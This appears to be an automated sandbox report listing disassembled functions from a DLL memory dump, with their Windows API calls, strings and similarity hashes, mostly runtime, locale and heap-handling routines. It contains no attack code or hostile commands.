Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8InitThrowstd::ios_base::_$AddstdH_prolog3___std_exception_copystd::locale::_
String ID:
API String ID: 2532293092-0
Opcode ID: 884a3638c6cd4875107f3134117ebc1cb859f8a78760458094ffab0084b7e24c
Instruction ID: 081bc13bb6b969680f8fcd61753ad526d975bb2f48623db06ddd2d68ccc7947a
Opcode Fuzzy Hash: 884a3638c6cd4875107f3134117ebc1cb859f8a78760458094ffab0084b7e24c
Instruction Fuzzy Hash: 2CF0E530210354ABE7609AF1D658B8B7BECEF00738F008C1EE5824BAA1C7B5F5448BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E5E65, Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E7E5E6C
std::locale::_Init.LIBCPMT ref: 6E7E5E8D

Part of subcall function 6E7E5693: __EH_prolog3.LIBCMT ref: 6E7E569A
Part of subcall function 6E7E5693: std::_Lockit::_Lockit.LIBCPMT ref: 6E7E56A5
Part of subcall function 6E7E5693: std::locale::_Setgloballocale.LIBCPMT ref: 6E7E56C0
Part of subcall function 6E7E5693: _Yarn.LIBCPMT ref: 6E7E56D6
Part of subcall function 6E7E5693: std::_Lockit::~_Lockit.LIBCPMT ref: 6E7E5716

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3Lockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 3152668004-0
Opcode ID: 72878c3a039b1564652ddaa0ec6ed227fa841369257e671bda39916f371f39d9
Instruction ID: 79d97d167cce43a1ff824d38765b16552938d9147fc2b587d6436c64c57012be
Opcode Fuzzy Hash: 72878c3a039b1564652ddaa0ec6ed227fa841369257e671bda39916f371f39d9
Instruction Fuzzy Hash: EAE02672B017129FD7151BECAA0139C63946F41B14F500C5AD110AFAE0CFB549004BC4

Uniqueness

Uniqueness Score: -1.00%

Function 6E8059BB, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 6E7FC3A0: HeapAlloc.KERNEL32(00000008,000000FF,00000000,?,6E7F9B08,00000001,00000364,00000008,000000FF,?,6E7F69EA,000000FF,000000FF), ref: 6E7FC3E1

_free.LIBCMT ref: 6E805A27

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocHeap_free
String ID:
API String ID: 1080816511-0
Opcode ID: 1bf9563ee1022b1e4435c221d506c45223fd8e31214bc515f095f314ae927470
Instruction ID: 9750fa6a94141818417f9db3c624584b12bf3181c1ec04dd646729f8feda3786
Opcode Fuzzy Hash: 1bf9563ee1022b1e4435c221d506c45223fd8e31214bc515f095f314ae927470
Instruction Fuzzy Hash: ED01DB721543059BE331CF99DC8599AFBEDEB85370F650A1DD594872C0EB306906C674

Uniqueness

Uniqueness Score: -1.00%

Function 6E7FA994, Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 6E7FC3A0: HeapAlloc.KERNEL32(00000008,000000FF,00000000,?,6E7F9B08,00000001,00000364,00000008,000000FF,?,6E7F69EA,000000FF,000000FF), ref: 6E7FC3E1

_free.LIBCMT ref: 6E7FA9B4

Part of subcall function 6E7F9268: HeapFree.KERNEL32(00000000,00000000,?,6E7F69EA,000000FF,000000FF), ref: 6E7F927E
Part of subcall function 6E7F9268: GetLastError.KERNEL32(6E7F6065,?,6E7F69EA,000000FF,000000FF), ref: 6E7F9290

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocErrorFreeLast_free
String ID:
API String ID: 3091179305-0
Opcode ID: e54c666a8d6b3a1cf6783247a70a3f1d4a12656cdc46d5dd4aa588a3377d9f84
Instruction ID: 608bddd9fd663db331cc111c365f2ba3b91aed621e36e9f60a34614c01300c51
Opcode Fuzzy Hash: e54c666a8d6b3a1cf6783247a70a3f1d4a12656cdc46d5dd4aa588a3377d9f84
Instruction Fuzzy Hash: 3BF03CB5A04705AFC710DFA8C541B9AB7F8EB48710F104166E918DB340EB71A911CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E5DFE, Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E7E5E05

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: 3eede2cce7e58522aac7174950900057e0dc46e294601ae6bbecbad28074f080
Instruction ID: 2c4a53e08987ba6be70017118282150f7228df55df831b19c63b62a5428af254
Opcode Fuzzy Hash: 3eede2cce7e58522aac7174950900057e0dc46e294601ae6bbecbad28074f080
Instruction Fuzzy Hash: AB01C474600209CFDB25CF98C944B9DBBF4BF08319F50885DEAA95B351C7B29A45CB80

Uniqueness

Uniqueness Score: -1.00%

Function 6E7FC3A0, Relevance: 1.3, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32(00000008,000000FF,00000000,?,6E7F9B08,00000001,00000364,00000008,000000FF,?,6E7F69EA,000000FF,000000FF), ref: 6E7FC3E1

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 52725bcf5822864e661017ac2ac8ab53608b8bf79d71faf0ecdda249acd6299f
Instruction ID: 8e2a34a113ea11b5d3666e882bdf67610f4c8e5422f1059f963a9c886b014a56
Opcode Fuzzy Hash: 52725bcf5822864e661017ac2ac8ab53608b8bf79d71faf0ecdda249acd6299f
Instruction Fuzzy Hash: 7DF02B31140625DBEB50CAEACB54A4A375C9F416E2B008421AC28EF3B4CF70D80787D7

Uniqueness

Uniqueness Score: -1.00%

Function 6E7F92A2, Relevance: 1.3, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32(00000000,00000103,000000FF,?,6E7E865C,00000105,000000FF,24448D6E,00000000,?,6E7D14D7,?,00000103,000000FF), ref: 6E7F92D4

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 5cef4599dd84b2695961e9269515a5eb330feb8565888de50e8d7fcc1c406160
Instruction ID: c87826e97ddf3103ca7691c4805de1b3aca3f694d6fb097a0214972802011796
Opcode Fuzzy Hash: 5cef4599dd84b2695961e9269515a5eb330feb8565888de50e8d7fcc1c406160
Instruction Fuzzy Hash: 50E03031244522DBE6512EEA9F58B8A7A4C9F627B0B014531AC19A63B4DB64D803CAE9

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E7DED30, Relevance: 37.2, APIs: 18, Strings: 3, Instructions: 404stringmemoryCOMMON

Download Yara Rule

APIs

CoTaskMemAlloc.OLE32(6E7DE3C8,972AE1C9,00000000,00000000), ref: 6E7DEDCA
CharNextW.USER32(?,00000000), ref: 6E7DEE49
CharNextW.USER32(00000000,?,00000000), ref: 6E7DEE4E
CharNextW.USER32(00000000,?,00000000), ref: 6E7DEE53
CharNextW.USER32(00000000,?,00000000), ref: 6E7DEE58
CharNextW.USER32(?,?,972AE1C9,00000000,00000000), ref: 6E7DEE8F
CharNextW.USER32(?,?,972AE1C9,00000000,00000000), ref: 6E7DEE9F
CharNextW.USER32(00000000,?,972AE1C9,00000000,00000000), ref: 6E7DEEFE
CoTaskMemFree.OLE32(00000000,972AE1C9,00000000,00000000), ref: 6E7DEF23
lstrcmpiW.KERNEL32(?,?,?,972AE1C9,00000000,00000000), ref: 6E7DEF7E
CoTaskMemFree.OLE32(00000000,?,972AE1C9,00000000,00000000), ref: 6E7DEF96
CharNextW.USER32(?,?,972AE1C9,00000000,00000000), ref: 6E7DEFE3
CharNextW.USER32(?,972AE1C9,00000000,00000000), ref: 6E7DEFF3
CoTaskMemFree.OLE32(00000000,?,972AE1C9,00000000,00000000), ref: 6E7DF015
CoTaskMemFree.OLE32(00000000,972AE1C9,00000000,00000000), ref: 6E7DF033
lstrcmpiW.KERNEL32(?,6E817D3C,?,?,C000008C,00000000,00000000), ref: 6E7DF0ED
CoTaskMemFree.OLE32(00000000,C000008C,00000000,00000000), ref: 6E7DF10C
CharNextW.USER32(?,?,00000000,00000000,00000000,?,?,C000008C,00000000,00000000), ref: 6E7DF1D1

Strings

HKCR, xrefs: 6E7DEE30
HKCU{Software{Classes, xrefs: 6E7DEE5A
}}, xrefs: 6E7DEEE0

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$Task$Free$lstrcmpi$Alloc
String ID: }}$HKCR$HKCU{Software{Classes
API String ID: 2337762536-1142484189
Opcode ID: 6fd62b31f6230f04e582dccfe53257698b2239df1e38c402c610600c552bd7eb
Instruction ID: 48ac3c97c7df21394ac753e75aa80dceec48c798ffd7085a60a8f8b92603773f
Opcode Fuzzy Hash: 6fd62b31f6230f04e582dccfe53257698b2239df1e38c402c610600c552bd7eb
Instruction Fuzzy Hash: 85E1C431D0021A9FEB559FE4CA9479EB7F8EF05304F204579E905EB2A4EB359948CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E1300, Relevance: 26.7, APIs: 12, Strings: 3, Instructions: 462COMMON

Download Yara Rule

APIs

PdhCollectQueryData.PDH(?,972AE1C9,?,?,?,?,6E80947B,000000FF), ref: 6E7E13A7
PdhGetFormattedCounterValue.PDH(?,00000200,00000000,?,?,?,6E80947B,000000FF), ref: 6E7E1411
GetTextMetricsW.GDI32(?,?,00000010,?), ref: 6E7E1570
GetClientRect.USER32 ref: 6E7E187B
GetDeviceCaps.GDI32(?,0000005A), ref: 6E7E18F0
MulDiv.KERNEL32(?,00000000,00000048), ref: 6E7E1905
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 6E7E192A
SetTextColor.GDI32(?,?), ref: 6E7E1942
SelectObject.GDI32(?,00000000), ref: 6E7E194A
DrawTextW.USER32(?,?,?,?,00000000), ref: 6E7E1986
SelectObject.GDI32(?,00000000), ref: 6E7E1993
DeleteObject.GDI32(00000000), ref: 6E7E199A

Strings

%s%d.%d%s, xrefs: 6E7E17C8
[N/A], xrefs: 6E7E1747
%s%s%s, xrefs: 6E7E1822

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectText$Select$CapsClientCollectColorCounterCreateDataDeleteDeviceDrawFontFormattedMetricsQueryRectValue
String ID: %s%d.%d%s$%s%s%s$[N/A]
API String ID: 4229994797-711029782
Opcode ID: d18a2429885de6a84f4053a180e52d10cac3eba038625cf51dab80f0a453864f
Instruction ID: 364741a75ade16d48305a9b4eebed414b011ff9c540c81c5affe8258b9dfae90
Opcode Fuzzy Hash: d18a2429885de6a84f4053a180e52d10cac3eba038625cf51dab80f0a453864f
Instruction Fuzzy Hash: E1126771D006299FDB60CF58CD85ADAB7B9FF49304F4442E9E409A7661DB30AE85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E7DE200, Relevance: 10.7, APIs: 7, Instructions: 162libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000060), ref: 6E7DE28D
LoadLibraryExW.KERNEL32(?,00000000,00000002), ref: 6E7DE29F
FindResourceW.KERNEL32(00000000,?,?), ref: 6E7DE2C6
LoadResource.KERNEL32(00000000,00000000), ref: 6E7DE2DE

Part of subcall function 6E7DD8A0: GetLastError.KERNEL32(80070057,8007000E,80004005), ref: 6E7DD8A0

FreeLibrary.KERNEL32(00000000,00000000,?), ref: 6E7DE3CF

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$Resource$ErrorFindFreeLast
String ID:
API String ID: 328770362-0
Opcode ID: 47397681dbf385e6248f21fd7a8c73de7d1113cd4896806526dcc1162343675f
Instruction ID: 98cc835cfb72f433e4ef573e577581eb0ff9907e408e82c86b3bac12efe366ee
Opcode Fuzzy Hash: 47397681dbf385e6248f21fd7a8c73de7d1113cd4896806526dcc1162343675f
Instruction Fuzzy Hash: 2D5105B1D0061DDFDB12CF94CE44B9EB7B8EB89314F5001A9F608A72A0D7309A49CF99

Uniqueness

Uniqueness Score: -1.00%

Function 6E802744, Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1400COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 6E8028B6

Strings

1#QNAN, xrefs: 6E803AE8
1#INF, xrefs: 6E803AEF
1#IND, xrefs: 6E803ADA
1#SNAN, xrefs: 6E803AE1

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: ae5ddfe3128081cd7b5bc2fed599b4d3b951b5b57b4971048747086c52db36b0
Instruction ID: 70d5e9bfdb8fd88807c64413bd318d1dd96e75dc76b4008fb6317ca120c0f46f
Opcode Fuzzy Hash: ae5ddfe3128081cd7b5bc2fed599b4d3b951b5b57b4971048747086c52db36b0
Instruction Fuzzy Hash: 3BC26F71E086298FDB65CFA8DD44BDAB3B5EB45304F1149EAD40DE7281E778AE818F40

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E7B5A, Relevance: 9.0, APIs: 6, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000C,6E7E7A76,00000000,?,6E7E7C0D,00000000), ref: 6E7E7B5C
GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000,0000000C,6E7E7A76,00000000,?,6E7E7C0D,00000000), ref: 6E7E7B82
HeapAlloc.KERNEL32(00000000), ref: 6E7E7B89
InitializeSListHead.KERNEL32(00000000), ref: 6E7E7B96
GetProcessHeap.KERNEL32(00000000,00000000), ref: 6E7E7BAB
HeapFree.KERNEL32(00000000), ref: 6E7E7BB2

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$AllocFeatureFreeHeadInitializeListPresentProcessor
String ID:
API String ID: 1475849761-0
Opcode ID: b9ba687e6a6b4531861cb8518a36e1341fa591cdd88fc525025080b36487c09a
Instruction ID: 97b7f60955b198219b123922ad1170154e2299894d0b731082f07391fe32d02a
Opcode Fuzzy Hash: b9ba687e6a6b4531861cb8518a36e1341fa591cdd88fc525025080b36487c09a
Instruction Fuzzy Hash: BAF04F31640A02ABDB419FB8CD08B5637A9BF9A716F10487CF94AD3680DB308404CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E8055E0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,6E8058FF,?,00000000), ref: 6E805679
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,6E8058FF,?,00000000), ref: 6E8056A2
GetACP.KERNEL32(?,?,6E8058FF,?,00000000), ref: 6E8056B7

Strings

OCP, xrefs: 6E805634
ACP, xrefs: 6E8055FE

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 79da5363bd4b38d455dfa31bfe53cfa50f443c12e2d89ef6d17b3ff1e2002788
Instruction ID: dc06ba262f321f35f1983591ae638d3dc6bf3d469e2ff7e1772d3e7040f1e6d6
Opcode Fuzzy Hash: 79da5363bd4b38d455dfa31bfe53cfa50f443c12e2d89ef6d17b3ff1e2002788
Instruction Fuzzy Hash: D021C132655306AAE7708FD5CE05B8773BAEB41B60B528C64E82ACB154F732D940C3B0

Uniqueness

Uniqueness Score: -1.00%

Function 6E8057B4, Relevance: 7.7, APIs: 5, Instructions: 188COMMON

Download Yara Rule

APIs

Part of subcall function 6E7F9964: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E7EE3E6,6E81BFB8,0000000C,00000004,00000001,00000004,?,6E7D46B5,00000000,00000000), ref: 6E7F9968
Part of subcall function 6E7F9964: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6E7D46B5,00000000,00000000), ref: 6E7F9A0C
Part of subcall function 6E7F9964: _abort.LIBCMT ref: 6E7F9A12

Part of subcall function 6E7F9964: _free.LIBCMT ref: 6E7F99BF

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 6E8058C0
IsValidCodePage.KERNEL32(00000000), ref: 6E80591B
IsValidLocale.KERNEL32(?,00000001), ref: 6E80592A
GetLocaleInfoW.KERNEL32(?,00001001,6E7FADEF,00000040,?,6E7FAF0F,00000055,00000000,?,?,00000055,00000000), ref: 6E805972
GetLocaleInfoW.KERNEL32(?,00001002,6E7FAE6F,00000040), ref: 6E805991

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser_abort_free
String ID:
API String ID: 1247548202-0
Opcode ID: d9273af5c6eed2c40f41ab299941ba5b486c15ffe756516f5e42e221c977c5ac
Instruction ID: 2a4c6adcff5ad82dee58405a38816a665f5a28fd9461295610e1c8c3486e67dc
Opcode Fuzzy Hash: d9273af5c6eed2c40f41ab299941ba5b486c15ffe756516f5e42e221c977c5ac
Instruction Fuzzy Hash: DF515E71A0070AABEF60DFE9DC54AAB77B9AF05700F144C69E925EB190E7709904CB71

Uniqueness

Uniqueness Score: -1.00%

Function 6E804E7C, Relevance: 6.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 6E7F9964: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E7EE3E6,6E81BFB8,0000000C,00000004,00000001,00000004,?,6E7D46B5,00000000,00000000), ref: 6E7F9968
Part of subcall function 6E7F9964: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6E7D46B5,00000000,00000000), ref: 6E7F9A0C
Part of subcall function 6E7F9964: _abort.LIBCMT ref: 6E7F9A12

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6E7FADF6,?,?,?,?,6E7FA9E8,?,00000004), ref: 6E804F5E
_wcschr.LIBVCRUNTIME ref: 6E804FEE
_wcschr.LIBVCRUNTIME ref: 6E804FFC
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,6E7FADF6,00000000,6E7FAF16), ref: 6E80509F

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort
String ID:
API String ID: 4244957817-0
Opcode ID: 5042cf80f83aaa3260930af814c654e221a68521b9435b4f0968df021df47b4b
Instruction ID: d69a84de2a3d4188a99387a0f7afe3feccf0d29b637ae4bf09ca2988f4e1903b
Opcode Fuzzy Hash: 5042cf80f83aaa3260930af814c654e221a68521b9435b4f0968df021df47b4b
Instruction Fuzzy Hash: 1361F371640706ABEB24DFF5CC55AEA73ACEF49754F100C2AE915DB1D0EB70EA4287A0

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E48F9, Relevance: 6.0, APIs: 4, Instructions: 12COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,6E7E4A18,6E80A3CC,00000017), ref: 6E7E48FE
UnhandledExceptionFilter.KERNEL32(6E80A3CC,?,6E7E4A18,6E80A3CC,00000017), ref: 6E7E4907
GetCurrentProcess.KERNEL32(C0000409,?,6E7E4A18,6E80A3CC,00000017), ref: 6E7E4912
TerminateProcess.KERNEL32(00000000,?,6E7E4A18,6E80A3CC,00000017), ref: 6E7E4919

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: fb3c6392839a150a3f4115ddc7a165fc84d834439c4ed53fbdacb525cf4a89af
Instruction ID: f1efb41bdf8f174615999b1afa7af0456028935360d896291551f3efad944069
Opcode Fuzzy Hash: fb3c6392839a150a3f4115ddc7a165fc84d834439c4ed53fbdacb525cf4a89af
Instruction Fuzzy Hash: 14D0EA72044A48EFEF002BE1D80DA697A28AB0A656F048899F70E86451DA715611DBE5

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E78AF, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 6E7D81F0: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,6E81C600), ref: 6E7D81F5
Part of subcall function 6E7D81F0: GetLastError.KERNEL32(?,00000000,00000000,?,6E81C600), ref: 6E7D81FF

IsDebuggerPresent.KERNEL32(?,?,?,6E7D11DF), ref: 6E7E78E2
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,6E7D11DF), ref: 6E7E78F1

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 6E7E78EC

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3511171328-631824599
Opcode ID: 8e9a511a1872425342b2947b2d45699c1868e38fe57589db49a8ea04042858ff
Instruction ID: d2c5196584a55ee008fe7372552b4c6ebaaf863e10669f28a8d8b9b7f8798643
Opcode Fuzzy Hash: 8e9a511a1872425342b2947b2d45699c1868e38fe57589db49a8ea04042858ff
Instruction Fuzzy Hash: 78E06570200B428BE3208FA4D6083467BE8AF14308F008C6CD4EAC6B90EBB5D488CFE1

Uniqueness

Uniqueness Score: -1.00%

Function 6E805267, Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 6E7F9964: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E7EE3E6,6E81BFB8,0000000C,00000004,00000001,00000004,?,6E7D46B5,00000000,00000000), ref: 6E7F9968
Part of subcall function 6E7F9964: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6E7D46B5,00000000,00000000), ref: 6E7F9A0C
Part of subcall function 6E7F9964: _abort.LIBCMT ref: 6E7F9A12

Part of subcall function 6E7F9964: _free.LIBCMT ref: 6E7F99BF

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6E8052BB
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6E80530C
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6E8053CC

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
